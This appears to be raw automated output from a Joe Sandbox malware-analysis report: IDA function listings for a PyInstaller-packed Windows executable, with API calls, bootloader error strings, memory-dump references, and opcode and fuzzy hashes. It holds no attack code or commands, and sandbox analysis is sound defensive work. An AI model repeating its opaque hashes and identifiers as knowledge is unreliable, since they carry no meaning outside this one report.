                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F3DD86B7,?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD822C
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                      • API String ID: 1662231829-930877121
                                                                                      • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                      • Instruction ID: a8701849d75f3fde35995c81857c6491dccaffc4380616e41407ab6daf436257
                                                                                      • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                      • Instruction Fuzzy Hash: BB518711A2D68291FBD1BBA5D8516B9F250AF94780FC44431DA2EAE7D9EE3CE50483F0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: NameName::$Name::operator+atolswprintf_s
                                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                      • API String ID: 2331677841-2441609178
                                                                                      • Opcode ID: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
                                                                                      • Instruction ID: 0aa04c2ff9cb02fadf6efb6f70a99f7c387b5e23b75c01969de41cab8b77448e
                                                                                      • Opcode Fuzzy Hash: 04052d8e5626c1f24672c52f4d573e3506f88365006a7f318b5907256fbad706
                                                                                      • Instruction Fuzzy Hash: 4BF1BF22E08E4685FB25BB67DD581FC27B4AF65374F9001B6CE0D26AF5DEBCA5248340
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                      • API String ID: 2050909247-1550345328
                                                                                      • Opcode ID: d8e1660e306644a3059456114562463667108454f96654c664cb3035ad910b0d
                                                                                      • Instruction ID: 49c70b0aacbad83e1b3dc2436593b74adcfd4fa2dc1f5cb23b310c3ec4c07e38
                                                                                      • Opcode Fuzzy Hash: d8e1660e306644a3059456114562463667108454f96654c664cb3035ad910b0d
                                                                                      • Instruction Fuzzy Hash: 99519E61B0964392EB94BBA194401B9B3A4FF84B94FC44631ED3C2F7D6DE3CE58587A0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 2943138195-0
                                                                                      • Opcode ID: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
                                                                                      • Instruction ID: 874a8ff497e123fc18f1a207610dfdc8a2b5ee38f365e93e9af6a589e55e0dcb
                                                                                      • Opcode Fuzzy Hash: 9a3856515ab70ac0cbef49cb78169d28014df4ca819d0bec0dbbb0bc7461e156
                                                                                      • Instruction Fuzzy Hash: 4AF18D76B08E869EE711EFA6D8901FC37B0EB0435CB804076DA4D57AE9EEB8D525D340
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockFrameHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 4223619315-393685449
                                                                                      • Opcode ID: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
                                                                                      • Instruction ID: fa495b51d8a244a44a73aef56e9429b1c11433372d769c847165c0ba75629b35
                                                                                      • Opcode Fuzzy Hash: dcb3548c504605ccad87c1df068e82445ce8bfed626f824eb2c4e809fdb80efd
                                                                                      • Instruction Fuzzy Hash: 6ED1A572A08F418AEB10EF66D8402AD77A0FB457A8F900176DE8D57BA5CF78E5B0C740
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Replicator::operator[]
                                                                                      • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                      • API String ID: 3676697650-3207858774
                                                                                      • Opcode ID: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
                                                                                      • Instruction ID: c42de7e69071db82a31ebe0d54f39b8d83f3da7017fbd61011da14843ee1baba
                                                                                      • Opcode Fuzzy Hash: 73310b6c18e80224c33410df5d9c8b136be81ee7f088e8962b8740eac16092a6
                                                                                      • Instruction Fuzzy Hash: AB919272A08E4A9AFB10AF22DC505B837B1AB58768F8541B2DA8D037F5DFBCE555C340
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                      • String ID: Needs to remove its temporary files.
                                                                                      • API String ID: 3975851968-2863640275
                                                                                      • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                      • Instruction ID: fa1522f97fb98892dfe46c309bd3000e60e2174a9f8c404bb961c01f4937379c
                                                                                      • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                      • Instruction Fuzzy Hash: EB218821B09A4282E7916BF9F884179A350EF89B90F984131DE3D5B3D8DE2CD5598360
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID:
                                                                                      • API String ID: 2943138195-0
                                                                                      • Opcode ID: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
                                                                                      • Instruction ID: 15e1cfec16e551025ea8043ae1c0099867d2d6a6c4fc9b2ceb2eb1b2429cb1d2
                                                                                      • Opcode Fuzzy Hash: 3cac31fbce2037cca8b65a6457a1f6e1f72e09754060cc87a73fdfbcf94b07ef
                                                                                      • Instruction Fuzzy Hash: BC717D72B15E469DEB15EFA2C8801FC33B5AB0479CB804472DA4D57AE9DFB8D625C380
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                      • API String ID: 2943138195-1464470183
                                                                                      • Opcode ID: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
                                                                                      • Instruction ID: 2bd209d0f31c5ed96c81f0e2cf5bb0227c93bf671e1507fe54442370fead3985
                                                                                      • Opcode Fuzzy Hash: 50e8110e92645124a6d82ffc9330fdaa6dc52167fa44e73d911cd3f80f86a47a
                                                                                      • Instruction Fuzzy Hash: 1A515E31E18E5ACAF710EF66EC805BC2771BB14368F904175DA4D53AE9DFA8E965C300
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: -$:$f$p$p
                                                                                      • API String ID: 3215553584-2013873522
                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                      • Instruction ID: 5e72220c1a9951190760defcdf5b29bcb7f8b6d8fdbf3005cafdf6d8a8781a45
                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                      • Instruction Fuzzy Hash: D112D662E1C24386FBA87E94D144279FE91FB40754FC44235D6A92BAC4DF3CE5C08BA2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: f$f$p$p$f
                                                                                      • API String ID: 3215553584-1325933183
                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                      • Instruction ID: 93c77003ae05eb8f7df6ed0cd9f73ba6a37035c28a0fe4c194a1df7c6810b29a
                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                      • Instruction Fuzzy Hash: 2B12AB62F0C14385FBA8BA94D044279FEA9FB40754FC44235D6BA5A6C4DB7CE4C487A2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 211107550-393685449
                                                                                      • Opcode ID: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
                                                                                      • Instruction ID: af2698ca1f068180cb7d4bbe3f7227779353ebc3ce2927a35cf995eb3e0c7dc9
                                                                                      • Opcode Fuzzy Hash: aad8d4203d0b1849c4fce47835e3c613ec0ba3b35d99662ed70f641d37e67567
                                                                                      • Instruction Fuzzy Hash: 2EE1C273908B828AE710AF76D8803BD77A0FB44768F940276DA8D576E5DF78E5A1C700
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      • Opcode ID: 4b5b6e3fcef3044075732b7736491b2407c08096ec4bb89f35b93de1ee291999
                                                                                      • Instruction ID: dadcda14d6b83b980c0354c7bfc0dc0128aa30ee8e9a7e8485dd92544c0c36ec
                                                                                      • Opcode Fuzzy Hash: 4b5b6e3fcef3044075732b7736491b2407c08096ec4bb89f35b93de1ee291999
                                                                                      • Instruction Fuzzy Hash: 81418E61A0865382EB94FB92A8406B9F7A5FF44BC4FC44532ED2D2B7C5DE3CE54583A0
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD8704
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD870A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD874C
                                                                                        • Part of subcall function 00007FF7F3DD8830: GetEnvironmentVariableW.KERNEL32(00007FF7F3DD388E), ref: 00007FF7F3DD8867
                                                                                        • Part of subcall function 00007FF7F3DD8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F3DD8889
                                                                                        • Part of subcall function 00007FF7F3DE8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE8251
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                      • API String ID: 3563477958-1339014028
                                                                                      • Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction ID: 5460fdd844c23a0caff50222cc78e142a0a5b6fb2ca46bdd174d2b9a71add00c
                                                                                      • Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
                                                                                      • Instruction Fuzzy Hash: 9B419F11A1964254FB96B7E1A8652B9A290AF84BC0FC04131ED3D6F7DADE3CE545C3E0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Name::operator+
                                                                                      • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                      • API String ID: 2943138195-2239912363
                                                                                      • Opcode ID: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
                                                                                      • Instruction ID: b79f4730f684e6a29947a852956668a9af22be3f671a899f4cc6fb68bbfda555
                                                                                      • Opcode Fuzzy Hash: 0e84257edd8271f32b759845b73cd3eefe07970f5e22a962a9d02e38f5861642
                                                                                      • Instruction Fuzzy Hash: D3518D62E09F458DFB159B62DC402BD3BB0BB08768F844176CA8D12BE9DFBC9164C700
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 849930591-393685449
                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction ID: 87e55a07004d764e5f578cf396403638c36e6746f4176f38b9332c186a714f53
                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction Fuzzy Hash: C7D1813290874186EBA0EFA5D4403ADB7A4FB45788F900135EE9D6B7D9DF38E485C790
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2975634958.00007FFE126C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE126C0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2975620067.00007FFE126C0000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975669074.00007FFE126D8000.00000004.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000001.00000002.2975683450.00007FFE126D9000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffe126c0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                      • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                      • API String ID: 1852475696-928371585
                                                                                      • Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                      • Instruction ID: e3529c7c42af87bcc5cb6a07d845d3282d79ba30fa6ab6936adc7a1f4dfefd6f
                                                                                      • Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                      • Instruction Fuzzy Hash: 8F51A262A18E4A9ADE20EF12EC501B96360FF84BA4F804471DA8D036B5DFBCF925C704
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000019FAF4B9778,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE8C
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000019FAF4B9778,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE98
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeLibraryProc
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3013587201-537541572
                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction ID: 37933d31b63b379ae2dcbb5bd94ec17a9785335afdd77bd7dc2312315796d10e
                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction Fuzzy Hash: 68414761B09A1241EB99EB929800275A691BF48BD0FC84235DD3D6F3C4DF7CE88583A1
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                      • API String ID: 3940978338-251083826
